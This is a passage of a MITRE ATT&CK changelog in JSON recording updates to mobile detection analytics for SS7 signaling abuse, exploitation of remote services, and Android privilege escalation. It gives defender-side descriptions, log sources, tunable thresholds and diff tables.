                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"LocationQueryAnomalyThreshold\", \"description\": \"Baseline deviation tolerance for location resolution events\"}, {\"field\": \"SignalingPathDeviationThreshold\", \"description\": \"Expected vs observed signaling routing paths\"}, {\"field\": \"SubscriberResolutionFrequency\", \"description\": \"Threshold for abnormal resolution or lookup behavior\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-24 17:56:26.375000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes anomalous signaling interactions involving subscriber identity or location resolution events associated with a device, including abnormal routing requests, unexpected location information exchanges, or signaling node inconsistencies indicative of SS7 abuse. (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.\", \"old_value\": \"Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"TelecomLogs:MobilityEvents\", \"channel\": \"Unexpected subscriber tracking or abnormal mobility/location resolution activity\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to148__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to148__0\"><a href=\"#difflib_chg_to148__top\">t</a></td><td class=\"diff_header\" id=\"from148_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Network&nbsp;carriers&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;use&nbsp;firewalls,&nbsp;Intrusion&nbsp;Det</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to148__top\">t</a></td><td class=\"diff_header\" id=\"to148_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;anomalous&nbsp;signaling&nbsp;interactions&nbsp;involving</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ection&nbsp;Systems&nbsp;(IDS),&nbsp;or&nbsp;Intrusion&nbsp;Prevention&nbsp;Systems&nbsp;(IPS)&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;subscriber&nbsp;identity&nbsp;or&nbsp;location&nbsp;resolution&nbsp;events&nbsp;associate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">to&nbsp;detect&nbsp;and/or&nbsp;block&nbsp;SS7&nbsp;exploitation.(Citation:&nbsp;CSRIC5-WG</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;with&nbsp;a&nbsp;device,&nbsp;including&nbsp;abnormal&nbsp;routing&nbsp;requests,&nbsp;unexpe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">10-FinalReport)&nbsp;The&nbsp;CSRIC&nbsp;also&nbsp;suggests&nbsp;threat&nbsp;information&nbsp;s</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cted&nbsp;location&nbsp;information&nbsp;exchanges,&nbsp;or&nbsp;signaling&nbsp;node&nbsp;incon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">haring&nbsp;between&nbsp;telecommunications&nbsp;industry&nbsp;members.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sistencies&nbsp;indicative&nbsp;of&nbsp;SS7&nbsp;abuse.&nbsp;(Citation:&nbsp;CSRIC5-WG10-F</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">inalReport)&nbsp;The&nbsp;CSRIC&nbsp;also&nbsp;suggests&nbsp;threat&nbsp;information&nbsp;shari</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;between&nbsp;telecommunications&nbsp;industry&nbsp;members.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--ee4ce869-6b88-46f8-829a-9838f7607a8f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-23 17:50:48.706000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0663#AN1755",
                            "external_id": "AN1755"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1755",
                    "description": "Defender observes a mobile device initiating abnormal or exploit-like network interactions with internal or remote services, followed by process-level instability, privilege boundary shifts, or unexpected execution behaviors indicative of service exploitation outcomes.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Connections",
                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "AndroidLogs:Crash",
                            "channel": "Application or system process crash/restart patterns temporally associated with remote service communications"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ProtocolAnomalyThreshold",
                            "description": "Defines deviation tolerance for malformed or exploit-like protocol behavior"
                        },
                        {
                            "field": "CrashCorrelationWindow",
                            "description": "Temporal linkage between suspicious network activity and process instability"
                        },
                        {
                            "field": "EnterpriseServiceBaseline",
                            "description": "Environment-specific baseline of expected internal service communications"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"ProtocolAnomalyThreshold\", \"description\": \"Defines deviation tolerance for malformed or exploit-like protocol behavior\"}, {\"field\": \"CrashCorrelationWindow\", \"description\": \"Temporal linkage between suspicious network activity and process instability\"}, {\"field\": \"EnterpriseServiceBaseline\", \"description\": \"Environment-specific baseline of expected internal service communications\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 17:50:48.706000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes a mobile device initiating abnormal or exploit-like network interactions with internal or remote services, followed by process-level instability, privilege boundary shifts, or unexpected execution behaviors indicative of service exploitation outcomes.\", \"old_value\": \"Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \\nApplication vetting may be able to identify applications that perform [Discovery](https://attack.mitre.org/tactics/TA0032) or utilize existing connectivity to remotely access hosts within an internal enterprise network. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \\n-Application vetting may be able to identify applications that perform [Discovery](https://attack.mitre.org/tactics/TA0032) or utilize existing connectivity to remotely access hosts within an internal enterprise network. \\n+Defender observes a mobile device initiating abnormal or exploit-like network interactions with internal or remote services, followed by process-level instability, privilege boundary shifts, or unexpected execution behaviors indicative of service exploitation outcomes.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Connections\", \"channel\": \"Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"AndroidLogs:Crash\", \"channel\": \"Application or system process crash/restart patterns temporally associated with remote service communications\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to119__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to119__0\"><a href=\"#difflib_chg_to119__top\">t</a></td><td class=\"diff_header\" id=\"from119_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Network&nbsp;traffic&nbsp;analysis&nbsp;could&nbsp;reveal&nbsp;patterns&nbsp;of&nbsp;compromise</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to119__top\">t</a></td><td class=\"diff_header\" id=\"to119_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;a&nbsp;mobile&nbsp;device&nbsp;initiating&nbsp;abnormal&nbsp;or&nbsp;exp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;if&nbsp;devices&nbsp;attempt&nbsp;to&nbsp;access&nbsp;unusual&nbsp;targets&nbsp;or&nbsp;resources.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">loit-like&nbsp;network&nbsp;interactions&nbsp;with&nbsp;internal&nbsp;or&nbsp;remote&nbsp;servi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Application&nbsp;vetting&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;identify&nbsp;applications&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ces,&nbsp;followed&nbsp;by&nbsp;process-level&nbsp;instability,&nbsp;privilege&nbsp;bounda</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">at&nbsp;perform&nbsp;[Discovery](https://attack.mitre.org/tactics/TA00</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ry&nbsp;shifts,&nbsp;or&nbsp;unexpected&nbsp;execution&nbsp;behaviors&nbsp;indicative&nbsp;of&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">32)&nbsp;or&nbsp;utilize&nbsp;existing&nbsp;connectivity&nbsp;to&nbsp;remotely&nbsp;access&nbsp;host</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ervice&nbsp;exploitation&nbsp;outcomes.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;within&nbsp;an&nbsp;internal&nbsp;enterprise&nbsp;network.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6d2d8aff-7d23-40bc-bc29-54852baed5f1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-23 17:58:13.523000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0663#AN1756",
                            "external_id": "AN1756"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1756",
                    "description": "Defender observes a mobile device engaging remote or internal services with traffic characteristics inconsistent with normal application behavior, followed by execution anomalies, application instability, or security context deviations consistent with exploitation effects.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Connections",
                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "iOS:unifiedlog",
                            "channel": "Application crash logs, watchdog terminations, or abnormal execution events associated with service communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TrafficDeviationThreshold",
                            "description": "Defines acceptable protocol and payload variation"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TrafficDeviationThreshold\", \"description\": \"Defines acceptable protocol and payload variation\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 17:58:13.523000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes a mobile device engaging remote or internal services with traffic characteristics inconsistent with normal application behavior, followed by execution anomalies, application instability, or security context deviations consistent with exploitation effects.\", \"old_value\": \"Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \\nApplication vetting may be able to identify applications that perform [Discovery](https://attack.mitre.org/tactics/TA0032) or utilize existing connectivity to remotely access hosts within an internal enterprise network. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \\n-Application vetting may be able to identify applications that perform [Discovery](https://attack.mitre.org/tactics/TA0032) or utilize existing connectivity to remotely access hosts within an internal enterprise network. \\n+Defender observes a mobile device engaging remote or internal services with traffic characteristics inconsistent with normal application behavior, followed by execution anomalies, application instability, or security context deviations consistent with exploitation effects.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Connections\", \"channel\": \"Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Application crash logs, watchdog terminations, or abnormal execution events associated with service communication\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to146__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to146__0\"><a href=\"#difflib_chg_to146__top\">t</a></td><td class=\"diff_header\" id=\"from146_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Network&nbsp;traffic&nbsp;analysis&nbsp;could&nbsp;reveal&nbsp;patterns&nbsp;of&nbsp;compromise</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to146__top\">t</a></td><td class=\"diff_header\" id=\"to146_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;a&nbsp;mobile&nbsp;device&nbsp;engaging&nbsp;remote&nbsp;or&nbsp;interna</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;if&nbsp;devices&nbsp;attempt&nbsp;to&nbsp;access&nbsp;unusual&nbsp;targets&nbsp;or&nbsp;resources.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l&nbsp;services&nbsp;with&nbsp;traffic&nbsp;characteristics&nbsp;inconsistent&nbsp;with&nbsp;no</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Application&nbsp;vetting&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;identify&nbsp;applications&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rmal&nbsp;application&nbsp;behavior,&nbsp;followed&nbsp;by&nbsp;execution&nbsp;anomalies,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">at&nbsp;perform&nbsp;[Discovery](https://attack.mitre.org/tactics/TA00</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">application&nbsp;instability,&nbsp;or&nbsp;security&nbsp;context&nbsp;deviations&nbsp;cons</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">32)&nbsp;or&nbsp;utilize&nbsp;existing&nbsp;connectivity&nbsp;to&nbsp;remotely&nbsp;access&nbsp;host</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">istent&nbsp;with&nbsp;exploitation&nbsp;effects.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;within&nbsp;an&nbsp;internal&nbsp;enterprise&nbsp;network.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f463fae8-5697-4539-b6c7-e67aadf81c73",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-12-04 17:12:06.342000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0665#AN1758",
                            "external_id": "AN1758"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1758",
                    "description": "From the defender\u2019s perspective, this strategy correlates signals that a previously unprivileged Android app or process has gained higher privileges through exploitation rather than normal OS or MDM flows. \nObservable behaviors include: \n(1) unprivileged app processes issuing sensitive syscalls or accessing privileged device interfaces, \n(2) bursts of SELinux denials followed by an unexpected domain or permission change, \n(3) creation of new processes running with system or root UID whose lineage traces back to an app sandbox path, and \n(4) crashes or abnormal restarts of privileged system services followed shortly by a new connection or binder interaction from the same low-privileged app. The focus is on unusual privilege transitions, anomalous process ancestry, and OS security policy violations, not on specific exploit binaries or CVE signatures.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "AndroidLogs:Crash",
                            "channel": "Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "AndroidLogs:Kernel",
                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "AndroidLogs:Framework",
                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window (for example, 60\u2013300 seconds) between SELinux events, crashes, and privilege changes to reduce noise while still capturing exploit chains."
                        },
                        {
                            "field": "AppUidRange",
                            "description": "UID ranges that represent unprivileged application accounts in a specific Android OEM or enterprise deployment."
                        },
                        {
                            "field": "SensitiveSyscalls",
                            "description": "List of syscalls considered indicative of privilege escalation attempts; may vary by kernel version, OEM drivers, and threat model."
                        },
                        {
                            "field": "PrivilegedServices",
                            "description": "Set of high-value Android system services where crashes or restarts are particularly suspicious (for example, system_server, mediaserver)."
                        },
                        {
                            "field": "PrivilegedUids",
                            "description": "Enterprise-defined mapping of UIDs considered elevated (for example, root, system, radio) for alert scoping."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window (for example, 60\\u2013300 seconds) between SELinux events, crashes, and privilege changes to reduce noise while still capturing exploit chains.\"}, {\"field\": \"AppUidRange\", \"description\": \"UID ranges that represent unprivileged application accounts in a specific Android OEM or enterprise deployment.\"}, {\"field\": \"SensitiveSyscalls\", \"description\": \"List of syscalls considered indicative of privilege escalation attempts; may vary by kernel version, OEM drivers, and threat model.\"}, {\"field\": \"PrivilegedServices\", \"description\": \"Set of high-value Android system services where crashes or restarts are particularly suspicious (for example, system_server, mediaserver).\"}, {\"field\": \"PrivilegedUids\", \"description\": \"Enterprise-defined mapping of UIDs considered elevated (for example, root, system, radio) for alert scoping.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-12-04 17:12:06.342000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender\\u2019s perspective, this strategy correlates signals that a previously unprivileged Android app or process has gained higher privileges through exploitation rather than normal OS or MDM flows. \\nObservable behaviors include: \\n(1) unprivileged app processes issuing sensitive syscalls or accessing privileged device interfaces, \\n(2) bursts of SELinux denials followed by an unexpected domain or permission change, \\n(3) creation of new processes running with system or root UID whose lineage traces back to an app sandbox path, and \\n(4) crashes or abnormal restarts of privileged system services followed shortly by a new connection or binder interaction from the same low-privileged app. The focus is on unusual privilege transitions, anomalous process ancestry, and OS security policy violations, not on specific exploit binaries or CVE signatures.\", \"old_value\": \"Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken.\\nApplication vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,6 @@\\n-Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken.\\n-Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.\\n+From the defender\\u2019s perspective, this strategy correlates signals that a previously unprivileged Android app or process has gained higher privileges through exploitation rather than normal OS or MDM flows. \\n+Observable behaviors include: \\n+(1) unprivileged app processes issuing sensitive syscalls or accessing privileged device interfaces, \\n+(2) bursts of SELinux denials followed by an unexpected domain or permission change, \\n+(3) creation of new processes running with system or root UID whose lineage traces back to an app sandbox path, and \\n+(4) crashes or abnormal restarts of privileged system services followed shortly by a new connection or binder interaction from the same low-privileged app. The focus is on unusual privilege transitions, anomalous process ancestry, and OS security policy violations, not on specific exploit binaries or CVE signatures.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"AndroidLogs:Crash\", \"channel\": \"Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"AndroidLogs:Kernel\", \"channel\": \"Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"AndroidLogs:Framework\", \"channel\": \"Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
